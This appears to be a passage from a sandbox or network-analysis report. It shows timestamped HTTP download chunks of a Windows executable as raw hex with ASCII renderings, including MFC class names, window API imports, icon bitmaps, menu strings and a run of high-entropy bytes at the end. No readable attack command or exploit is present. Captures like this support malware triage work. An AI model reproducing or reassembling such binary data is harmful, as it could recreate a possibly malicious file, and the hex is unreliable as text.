                                                                            2022-05-23 16:59:18 UTC1216INData Raw: b0 0f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 e1 06 00 30 10 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 48 10 06 00 00 00 00 00 00 00 00 00 58 10 06 00 00 00 00 00 00 00 00 00 00 00 00 00 98 e1 06 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 30 10 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 e1 06 00 a0 10 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 b8 10 06 00 00 00 00 00 00 00 00 00 d8 10 06 00 f8 37 06 00 a8 37 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 e1 06 00 02 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 a0 10 06 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: 0HX@077@
                                                                            2022-05-23 16:59:18 UTC1232INData Raw: fe 47 01 00 01 00 00 00 09 48 01 00 00 00 00 00 f7 48 01 00 03 00 00 00 1c 49 01 00 00 00 00 00 1f 4e 01 00 ff ff ff ff 26 4e 01 00 00 00 00 00 5d 4e 01 00 ff ff ff ff 62 4e 01 00 00 00 00 00 f6 4e 01 00 ff ff ff ff fb 4e 01 00 00 00 00 00 12 4f 01 00 ff ff ff ff 19 0a 02 00 0a 32 06 50 e0 9b 03 00 90 72 05 00 19 17 05 00 0e 62 0a c0 08 70 07 60 06 30 00 00 e0 9b 03 00 90 72 05 00 00 00 00 00 01 00 00 00 02 00 00 00 01 00 00 00 94 50 06 00 00 00 00 00 58 e2 06 00 28 00 00 00 b0 52 01 00 38 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 90 52 01 00 ff ff ff ff 00 00 00 00 d0 51 01 00 ff ff ff ff 0e 52 01 00 00 00 00 00 20 52 01 00 01 00 00 00 5a 52 01 00 00 00 00 00 5f 52 01 00 ff ff ff ff b0 52 01 00 00 00 00 00 bd 52 01 00 02 00 00 00 c7 52 01 00 00 00 00
                                                                            Data Ascii: GHHIN&N]NbNNNO2Prbp`0rPX(R8RQR RZR_RRRR
                                                                            2022-05-23 16:59:18 UTC1248INData Raw: 18 90 06 00 21 05 02 00 05 54 07 00 f0 e1 03 00 b2 e2 03 00 18 90 06 00 01 13 07 00 13 74 09 00 0e 64 08 00 09 34 06 00 04 42 00 00 01 46 05 00 46 34 08 00 10 74 09 00 04 42 00 00 21 00 00 00 f0 e4 03 00 70 e5 03 00 60 90 06 00 21 05 02 00 05 54 0b 00 f0 e4 03 00 70 e5 03 00 60 90 06 00 01 18 09 00 18 c4 08 00 13 74 0d 00 0e 64 0c 00 09 34 0a 00 04 82 00 00 21 00 00 00 30 e7 03 00 62 e7 03 00 4c 9f 06 00 21 11 04 00 11 74 0b 00 05 34 0a 00 30 e7 03 00 62 e7 03 00 4c 9f 06 00 01 2f 09 00 2f 74 09 00 16 64 08 00 11 54 07 00 0c 34 06 00 04 42 00 00 01 2f 09 00 2f 74 09 00 19 64 08 00 11 54 07 00 0c 34 06 00 04 42 00 00 21 00 00 00 b0 e9 03 00 d8 e9 03 00 f8 90 06 00 21 12 04 00 12 64 08 00 05 34 06 00 b0 e9 03 00 d8 e9 03 00 f8 90 06 00 01 19 05 00 19 74 09
                                                                            Data Ascii: !Ttd4BFF4tB!p`!Tp`td4!0bL!t40bL//tdT4B//tdT4B!!d4t
                                                                            2022-05-23 16:59:18 UTC1264INData Raw: 00 00 40 00 43 6c 69 65 6e 74 54 6f 53 63 72 65 65 6e 00 00 6e 01 47 65 74 57 69 6e 64 6f 77 44 43 00 0d 00 42 65 67 69 6e 50 61 69 6e 74 00 00 c8 00 45 6e 64 50 61 69 6e 74 00 00 6c 01 47 65 74 57 69 6e 64 6f 77 00 5f 01 47 65 74 53 79 73 74 65 6d 4d 65 74 72 69 63 73 00 00 78 01 47 65 74 57 69 6e 64 6f 77 52 65 63 74 00 77 01 47 65 74 57 69 6e 64 6f 77 50 6c 61 63 65 6d 65 6e 74 00 00 a0 02 53 79 73 74 65 6d 50 61 72 61 6d 65 74 65 72 73 49 6e 66 6f 41 00 95 01 49 6e 74 65 72 73 65 63 74 52 65 63 74 00 f8 01 4f 66 66 73 65 74 52 65 63 74 00 00 8a 02 53 65 74 57 69 6e 64 6f 77 50 6f 73 00 00 88 02 53 65 74 57 69 6e 64 6f 77 4c 6f 6e 67 57 00 00 73 01 47 65 74 57 69 6e 64 6f 77 4c 6f 6e 67 57 00 00 1c 00 43 61 6c 6c 57 69 6e 64 6f 77 50 72 6f 63 57 00 8f
                                                                            Data Ascii: @ClientToScreennGetWindowDCBeginPaintEndPaintlGetWindow_GetSystemMetricsxGetWindowRectwGetWindowPlacementSystemParametersInfoAIntersectRectOffsetRectSetWindowPosSetWindowLongWsGetWindowLongWCallWindowProcW
                                                                            2022-05-23 16:59:18 UTC1280INData Raw: 40 00 00 00 00 00 00 00 60 d7 05 10 00 00 00 00 00 00 00 00 00 00 00 00 2e 3f 41 56 43 52 6f 77 4c 69 73 74 56 69 65 77 40 40 00 00 00 00 00 00 60 d7 05 10 00 00 00 00 00 00 00 00 00 00 00 00 2e 3f 41 56 43 44 69 61 6c 6f 67 40 40 00 00 00 60 d7 05 10 00 00 00 00 00 00 00 00 00 00 00 00 2e 3f 41 56 43 41 62 6f 75 74 44 6c 67 40 40 00 60 d7 05 10 00 00 00 00 00 00 00 00 00 00 00 00 2e 3f 41 56 43 57 69 6e 54 68 72 65 61 64 40 40 00 00 00 00 00 00 00 00 60 d7 05 10 00 00 00 00 00 00 00 00 00 00 00 00 2e 3f 41 56 43 57 69 6e 41 70 70 40 40 00 00 00 60 d7 05 10 00 00 00 00 00 00 00 00 00 00 00 00 2e 3f 41 56 43 52 6f 77 4c 69 73 74 41 70 70 40 40 00 00 00 00 00 00 00 b5 31 05 10 00 00 00 00 2a 31 05 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: @`.?AVCRowListView@@`.?AVCDialog@@`.?AVCAboutDlg@@`.?AVCWinThread@@`.?AVCWinApp@@`.?AVCRowListApp@@1*1
                                                                            2022-05-23 16:59:18 UTC1296INData Raw: e4 95 06 00 d0 15 03 00 e3 16 03 00 14 7a 06 00 f0 16 03 00 16 17 03 00 e4 95 06 00 18 17 03 00 7e 17 03 00 44 7a 06 00 4c 1a 03 00 a3 1b 03 00 58 7a 06 00 ac 1b 03 00 c4 1b 03 00 e4 95 06 00 cc 1b 03 00 e4 1b 03 00 e4 95 06 00 e4 1b 03 00 3a 1c 03 00 a8 7a 06 00 44 1c 03 00 5c 1c 03 00 e4 95 06 00 5c 1c 03 00 7f 1c 03 00 20 3d 06 00 80 1c 03 00 6d 1e 03 00 6c 58 06 00 70 1e 03 00 47 1f 03 00 dc 7a 06 00 50 1f 03 00 68 1f 03 00 e4 95 06 00 68 1f 03 00 86 1f 03 00 14 7b 06 00 88 1f 03 00 a1 20 03 00 1c 7b 06 00 a4 20 03 00 23 21 03 00 24 7b 06 00 24 21 03 00 b2 21 03 00 d4 55 06 00 b4 21 03 00 73 22 03 00 30 7b 06 00 74 22 03 00 4e 23 03 00 48 7b 06 00 50 23 03 00 8a 25 03 00 58 7b 06 00 90 25 03 00 a8 25 03 00 e4 95 06 00 a8 25 03 00 6b 27 03 00 fc 7e 06
                                                                            Data Ascii: z~DzLXz:zD\\ =mlXpGzPhh{ { #!${$!!U!s"0{t"N#H{P#%X{%%%k'~
                                                                            2022-05-23 16:59:18 UTC1312INData Raw: ff ff ff ff ff ff ff ff ff fe 7f ff ff fc 3f ff ff f8 1f ff ff f0 0f ff ff e0 07 ff ff c0 03 ff ff c0 03 ff ff 3f fc ff fe 3f fc 7f fc 3f fc 3f f8 3e 7c 1f f0 3c 3c 0f e0 38 1c 07 e0 38 1c 07 f0 3c 3c 0f f8 3e 7c 1f fc 3f fc 3f fe 3f fc 7f ff 3f fc ff ff c0 03 ff ff c0 03 ff ff e0 07 ff ff f0 0f ff ff f8 1f ff ff fc 3f ff ff fe 7f ff ff ff ff ff ff ff ff ff ff ff ff ff 10 00 0f 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 01 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: ?????>|<<88<<>|?????( @
                                                                            2022-05-23 16:59:18 UTC1328INData Raw: 4d 4d 4d ff 4d 4d 4d ff 4d 4d 4d ff 4d 4d 4d ff 4d 4d 4d ff 4d 4d 4d ff 4d 4d 4d fc 4d 4d 4d ff 4d 4d 4d b0 4d 4d 4d 00 4d 4d 4d 03 4d 4d 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
                                                                            2022-05-23 16:59:18 UTC1344INData Raw: 4a 1b dc ff 4b 1d dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c db ff 4b 1c df ff 4a 1c cd ff 47 1d ad fb 47 1d b0 ff 47 1d b4 8f 47 1d af 00 4a 36 7d 07 4d 4d 4d 00 4d 4d 4d 84 4d 4d 4d ff 4d 4d 4d f7 4d 4d 4d ff 4d 4d 4d 7e 4d 4d 4d 00 4d 4d 4d 04 4d 4d 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4d 4d 4d 00 4d 4d 4d 01 4d 4d 4d 00 4d 4d 4d c6 4d 4d 4d ff 4d 4d 4d fc 4d 4d 4d ff 4d 4d 4d 32 4d 4f 47 00 4d 48 5d 03 4a 1c dc 00 4b 1c dc ca 4b 1c dc
                                                                            Data Ascii: JKKKKKKKKKKKJGGGGJ6}MMMMMMMMMMMMMMMMMM~MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM2MOGMH]JKK
                                                                            2022-05-23 16:59:18 UTC1360INData Raw: 7a 51 f0 ff 79 50 f0 ff 7e 55 f2 ff 66 3a e8 ff 48 19 da ff 4c 1d df ff 4a 1c cd ff 47 1d ad ff 47 1d b1 ff 47 1d b0 ff 47 1d b0 fd 47 1d b0 ff 47 1d b2 c5 3a 21 00 00 41 1e 61 00 45 23 c0 00 07 ba ff 00 11 a3 fc 00 11 a3 fc 03 12 a2 fb 00 12 a3 fb 00 12 a2 fb 00 02 8d e1 00 03 8e e2 00 03 8e e1 01 04 90 e5 02 03 8e e2 00 03 8e e2 00 07 96 eb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 aa ff 00 11 a3 fc 00 11 a3 fc 00 11 a3 fc 02 13 a4 fb 00 11 a4 fc 0a 11 a3 fc 5c 11 a3 fc 9a 11 a3 fc a1 11 a3 fc 78 11 a3 fc 23 11 a3 fd 00 11 a3 fc 03 11 a3 fc 01 09 b7 ff 00 4b 1d dc
                                                                            Data Ascii: zQyP~Uf:HLJGGGGGG:!AaE#\x#K
                                                                            2022-05-23 16:59:18 UTC1376INData Raw: 04 8b df 01 1f b8 ff 00 2b c9 ff 02 09 98 ee 35 07 94 e9 7f 05 92 e7 bd 04 91 e6 e4 04 90 e4 f9 04 90 e4 ff 03 90 e4 ff 03 8f e4 ff 03 8f e4 ff 03 8f e4 f3 04 90 e4 d8 04 90 e5 a6 04 91 e6 5f 07 95 eb 17 01 8c e0 00 00 85 d7 00 02 8e e3 03 0c 8c da 02 57 44 38 02 4e 4c 4b 00 4d 4d 4d 33 4d 4d 4d cb 4d 4d 4d ff 4d 4d 4d fb 4d 4d 4d fa 4d 4d 4d ff 4d 4d 4d d6 4d 4d 4d 17 4d 4d 4d 00 4d 4d 4d 02 4d 4d 4d 00 4d 4d 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4b 4b 4b 00 4d 4d 4d 00 4d 4d 4d 00 4d 4d 4d 02 4d 4d 4d 00 4d 4d 4d 1d 4d 4d 4d d4 4d 4d 4d ff 4d 4d 4d fa 4d 4d 4d fb 4d 4d 4d ff 4d 4d 4d fd 4d 4d 4d a1 4e 4e 4e 0e 4e 4d 4c 00 55 47 3e 01 03 90 e4 02 03 8f e3 03 03 90 d8 00 03 8f e5 00 02 8f e0
                                                                            Data Ascii: +5_WD8NLKMMM3MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMKKKMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNMLUG>
                                                                            2022-05-23 16:59:18 UTC1392INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 4d 4d 4d 00 4d 4d 4d 00 4d 4d 4d 00 4d 4d 4d 03 4d 4d 4d 00 4d 4d 4d 21 4d 4d 4d d4 4d 4d 4d ff 4d 4d 4d fd 4d 4d 4d ff 4d 4d 4d ff 4d 4d 4d fd 4d 4d 4d ff 4d 4d 4d bd 4e 4e 4e 0f 4e 4e 4e 00 4d 4d 4d 01 4e 4e 4e 00 4d 4d 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: MMMMMMMMMMMMMMMMMM!MMMMMMMMMMMMMMMMMMMMMMMMNNNNNNMMMNNNMMM
                                                                            2022-05-23 16:59:18 UTC1408INData Raw: 47 47 47 ff 51 51 51 ff 4c 4c 4c ff 46 46 47 ff a8 a7 a9 ff d9 db d2 ff 73 53 d7 ff 43 11 dd ff 4d 1f dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c db ff 4b 1c df ff 49 1c cb fe 47 1d ad ff 47 1d b2 f4 48 1d ba 23 48 19 c1 00 48 1a bf 02 4b 4a 4d 01 4d 4d 4d ce 4d 4d 4d ff 4d 4d 4d fb 4d 4d 4d ff 4d 4d 4d 47 4d 4d 4d 00 4d 4d 4d 03 4e 4e 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 51 51 51 00 4d 4d 4d 00 4d 4d 4d
                                                                            Data Ascii: GGGQQQLLLFFGsSCMKKKKKKKKKKKKIGGH#HHKJMMMMMMMMMMMMMMMMGMMMMMMNNNQQQMMMMMM
                                                                            2022-05-23 16:59:18 UTC1424INData Raw: 3b 3b 3b ff 2d 2d 2d ff 38 38 38 ff ae ae ae ff d5 d5 d6 ff c8 c8 c9 ff d2 d4 cc ff 6e 4b d9 ff 44 12 dd ff 4d 1f dc ff 4a 1b dc ff 48 18 db ff 48 18 db ff 4a 1b dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dd ff 4b 1c d8 ff 47 1d b3 ff 47 1d af ff 47 1d b0 ff 47 1d b0 fb 47 1d b0 ff 47 1d b3 99 47 1d ae 00 47 1d ae 03 48 1d b9 00 49 1e cb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: ;;;---888nKDMJHHJKKKKKGGGGGGGGHI
                                                                            2022-05-23 16:59:18 UTC1440INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 8e ee 00 03 8f e3 03 03 8e e2 00 03 8f e3 46 03 90 e4 ff 07 95 ea fb 0b 9b f2 fc 0f a0 f8 ff 10 a2 fb ff 11 a4 fd ff 12 a4 fd ff 12 a4 fd ff 12 a4 fd ff 12 a4 fd ff 11 a3 fc ff 10 a2 fa ff 0e 9e f6 ff 0a 99 f0 ff 06 93 e8 ff 03 8e e2 ff 02 8e e2 ff 03 8f e3 ff 03 8f e3 ff 03 8f e3 ff 03 8f e3 fe 03 8f e3 fb 03 8f e3 fe 03 8f e4 ff 05 91 e6 6f 00 8c e2 00 00 8f e6 03 3e 5e 70 01 4f 4d 4c 02 00 05 09 00 4d 4d 4d b8 4d 4d 4d ff 4d 4d 4d fa 4d 4d 4d ff 4d 4d 4d cb 4c 4c 4c 04 4c 4c 4c 00 4d 4d 4d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 4e 4e 00 4d 4d 4d 03 4d 4d 4d 00 4d 4d 4d 44 4d 4d 4d ff 4d 4d 4d fd 4d 4d 4d fb 4d 4d 4d ff 4d 4d 4d 8d 4c 4c 4c 00 4e 4b 4a 04 3d 5e 72
                                                                            Data Ascii: !Fo>^pOMLMMMMMMMMMMMMMMMLLLLLLMMMNNNMMMMMMMMMDMMMMMMMMMMMMMMMLLLNKJ=^r
                                                                            2022-05-23 16:59:18 UTC1456INData Raw: 20 00 61 00 6e 00 64 00 20 00 63 00 6f 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 0a 00 41 00 62 00 6f 00 75 00 74 00 34 00 51 00 75 00 69 00 74 00 20 00 74 00 68 00 65 00 20 00 61 00 70 00 70 00 6c 00 69 00 63 00 61 00 74 00 69 00 6f 00 6e 00 3b 00 20 00 70 00 72 00 6f 00 6d 00 70 00 74 00 73 00 20 00 74 00 6f 00 20 00 73 00 61 00 76 00 65 00 20 00 64 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 73 00 0a 00 45 00 78 00 69 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 41 28 00 53 00 77 00 69 00 74 00 63 00 68 00 20 00 74 00 6f 00 20 00 74 00 68 00 65 00 20 00 6e 00 65 00 78 00 74 00 20 00 77 00 69 00 6e 00 64 00 6f 00 77 00 20 00 70 00 61 00 6e 00 65 00 0a 00 4e 00 65 00 78 00 74 00 20 00 50 00 61 00 6e
                                                                            Data Ascii: and copyrightAbout4Quit the application; prompts to save documentsExitPA(Switch to the next window paneNext Pan
                                                                            2022-05-23 16:59:18 UTC1472INData Raw: c4 5b 22 3b bd 58 51 1b bd 43 63 19 d5 82 35 18 cf 93 9a fc 2c b1 b5 5b 95 36 56 7e e8 24 45 00 01 b2 7a b8 88 db 72 14 4f 97 1a 45 4a 2b 4f f0 56 bb 20 16 79 82 b2 74 fb 32 53 4d ce 44 16 52 45 19 49 52 b7 44 67 70 f3 1a 70 71 b1 07 72 10 79 9e a4 42 d9 36 56 56 fe 29 6b 20 f5 36 12 03 91 43 04 19 84 54 7a 89 bf ba 27 b4 12 14 4c 6c 32 06 6c b5 36 52 4f 84 9a 7a 3a b5 72 17 69 51 f3 87 43 3b 1a 45 4a 4a b9 37 72 10 e5 76 7d 63 73 e2 8d 89 1c 29 6b 20 28 fb 72 17 69 d3 42 14 63 95 5f 5e 8f db 74 57 76 b9 20 16 79 c8 1e 56 5a fd 33 49 7f 33 fa 33 bf 3b 8e 16 12 10 d1 11 af 61 eb 1c 14 53 68 20 49 a4 d8 37 76 52 4f f9 8d fb c4 44 16 52 bf 77 6d 72 bd 7c 67 68 d5 65 4e 63 f8 fa 5c f7 20 16 79 28 19 12 72 f7 33 49 6f d7 2f 8d c9 b2 3d 76 16 f1 f4 08 5e ea 2e
                                                                            Data Ascii: [";XQCc5,[6V~$EzrOEJ+OV yt2SMDREIRDgppqryB6VV)k 6CTz'Ll2l6ROz:riQC;EJJ7rv}cs)k (riBc_^tWv yVZ3I33;aSh I7vRODRwmr|gheNc\ y(r3Io/=v^.
                                                                            2022-05-23 16:59:18 UTC1488INData Raw: cd 7d dd 52 f7 5d 2b 59 9f 0c 02 5f b1 06 3e a5 70 39 59 84 17 12 4a 0e 04 6d ce 4d 52 8d 49 cc b2 d3 43 50 4e 3c ad 9a 22 db 35 a6 d6 32 64 7a da 83 22 3a fb f2 53 ed 4f 00 32 f9 73 53 c0 16 12 48 0b dd 1b b9 22 d9 74 57 26 bb 21 5a d0 07 76 1a f9 33 f3 e4 0b 24 52 3a bd 36 ed d2 34 30 0b db 16 69 e1 15 a8 3b df 7c 40 6a 11 ca 0e 56 22 ff 33 49 07 8b 77 e6 bf 77 6d 12 7e bb 46 d1 de 63 6a db 78 63 dd 75 ec bb 15 67 62 fb 36 52 5f e6 0a 80 76 f9 7b 6b c2 07 a6 bb 0e dc 12 ea 2f f0 b9 37 72 10 8c 3b 04 43 52 b5 37 2e e1 10 93 00 b3 3f 6e 75 ba 88 2f 74 c8 90 e6 3c 2b 1c 9e f8 1b 68 93 d3 98 a9 54 fb 27 2e f6 18 17 1a 47 34 36 b8 0c 0a 72 0b 83 25 55 20 d4 51 30 73 56 71 ef c6 b2 46 ec fb bf 70 77 aa 0a 60 5b f0 ad 33 f1 9f fa fc 8f 91 3b 01 7a db 7d 13 a1
                                                                            Data Ascii: }R]+Y_>p9YJmMRICPN<"52dz":SO2sSH"tW&!Zv3$R:640i;|@jV"3Iwwm~Fcjxcugb6R_v{k/7r;CR7.?nu/t<+hT'.G46r%U Q0sVqFpw`[3;z}
                                                                            2022-05-23 16:59:18 UTC1504INData Raw: 12 18 ca 14 7a 41 82 d9 a1 73 56 f7 21 5d eb 52 2d 72 cc cd c4 6e 4f 81 77 1d 20 df b6 ad b7 45 2c 98 a3 1f 6a db 7d 1c 91 75 1b d8 c7 e8 52 49 b3 ce 08 f5 44 00 3d 36 c6 58 0c 2d 45 b9 06 2f df 14 15 ec bb 62 1b f7 21 45 54 8a 28 72 f3 33 00 c3 1c 00 32 f3 43 44 d8 dc 42 30 84 15 31 cc 83 d0 30 b2 3b 5f 61 59 1c 2c 63 fb 37 19 b6 00 20 09 b3 07 59 87 9a 5c 36 74 c8 1d 31 25 e1 15 47 f8 1b 4f 2c b9 8a ab a6 25 73 76 b0 28 38 5e 12 12 36 7b c2 85 b7 75 34 ff 18 9e 95 d1 7d 04 d8 36 55 c8 d8 36 25 65 95 0a 8d aa 0a 6f ea 32 3f 33 c8 17 59 8b 11 50 5e a0 07 3f 39 f2 23 5f 21 39 52 43 95 37 0d 25 98 2d 4f 81 77 0d e2 ac 49 52 b7 45 3c 83 a1 2e 6a 14 bb 3e 29 74 ef 77 36 c8 1f 05 9a e1 20 6c 4f bf 78 96 31 33 f2 27 84 36 43 e8 61 d3 61 50 89 b1 ab 3c 64 88 26
                                                                            Data Ascii: zAsV!]R-rnOw E,j}uRID=6X-E/b!ET(r32CDB010;_aY,c7 Y\6t1%GO,%sv(8^6{u4}6U6%eo2?3YP^?9#_!9RC7%-OwIRE<.j>)tw6 lOx13'6CaaP<d&
                                                                            2022-05-23 16:59:18 UTC1520INData Raw: ea 89 6a 50 f1 1f 72 58 62 b3 2d 67 3a 5c 87 7a 77 aa 0b 24 02 82 f4 aa 49 d3 72 14 73 5f 66 61 6a 11 89 bb 3e e2 70 73 e1 18 93 08 dd f7 33 49 7f 1b 70 8d c9 b2 3d 76 06 99 df c6 5e ea 2e 74 00 f8 12 14 0c da cf 91 52 72 3a ff 72 a6 4e 02 32 3a bd e0 f0 56 37 30 43 18 dd a5 2a 0b 78 8c b6 fc a8 fe 19 10 1a f1 9e 36 3e e6 96 e8 0c 16 36 33 7a 92 7e b9 07 74 6e 29 e1 55 94 72 54 30 a3 76 7d 6b dd 94 7b 76 b0 29 6b 2c 56 d6 38 33 01 d7 f6 45 27 97 1a 45 4a 1c 30 19 56 71 dd 50 c8 62 93 33 ca 2d b6 17 e0 c1 5e 56 16 3f c8 16 12 10 2e e4 a1 9e ab 34 14 53 52 b1 10 16 79 95 48 80 8d b1 33 49 6b af 14 e0 36 58 0d 76 12 44 ca 14 7a 45 01 14 14 57 38 b9 20 16 7d c2 26 56 56 0c bd d2 3b 8b 76 56 12 b8 0d 76 16 d8 ad 81 5e 61 22 d9 35 58 57 32 64 7a d2 88 1a f1 b6
                                                                            Data Ascii: jPrXb-g:\zw$Irs_faj>ps3Ip=v^.tRr:rN2:V70C*x6>63z~tn)UrT0v}k{v)k,V83E'EJ0VqPb3-^V?.4SRyH3Ik6XvDzEW8 }&VV;vVv^a"5XW2dz
                                                                            2022-05-23 16:59:18 UTC1536INData Raw: 45 5b 1e 36 64 32 9e 06 72 2e c5 39 77 06 0a 20 5b fb 73 13 c8 27 16 f1 74 66 b8 e0 1f 70 4c 70 d2 f6 a3 77 41 c2 eb c8 72 f7 3a 75 5d 20 1b 74 5d 76 51 60 bf 75 5b e8 4f 69 6e 52 b1 06 4e 02 d2 7a cc 84 17 86 6d e4 89 6d ce 4d c6 0a d4 30 18 d3 73 c4 b7 41 5e 61 eb 25 c4 d7 75 3a 36 f5 1c b3 56 99 9a 76 b6 08 bf 0a f3 1f c6 35 c8 27 c6 72 d1 df 5c a6 2f a8 4e ec 5b 30 e5 77 a1 f2 85 72 72 f7 02 95 d5 e6 3f 72 f1 76 59 09 f4 06 43 db 13 71 9d b1 1b b9 ee 7d f5 fd e3 92 bb 71 b8 b7 9e 6b c6 4d 22 f9 7b 23 be b3 1d fa 92 b9 5d ab 22 dd 65 8f 97 d9 61 bb 14 53 d3 07 62 98 4a 65 4f 8b 77 62 bf 77 6d 6a bd 75 bb d9 1a 45 5a db 75 6b df 74 40 1a d2 06 72 36 f9 3b 5f 29 c4 45 c2 f9 7b c7 c0 16 12 10 ab e5 3d 61 6a 18 b3 b7 06 6d a7 fe 95 8f 1a fb 2e 52 7f 38 07
                                                                            Data Ascii: E[6d2r.9w [s'tfpLpwAr:u] t]vQ`u[OinRNzmmM0sA^a%u:6Vv5'r\/N[0wrr?rvYCq}qkM"{#]"eaSbJeOwbwmjuEZukt@r6;_)E{=ajm.R8
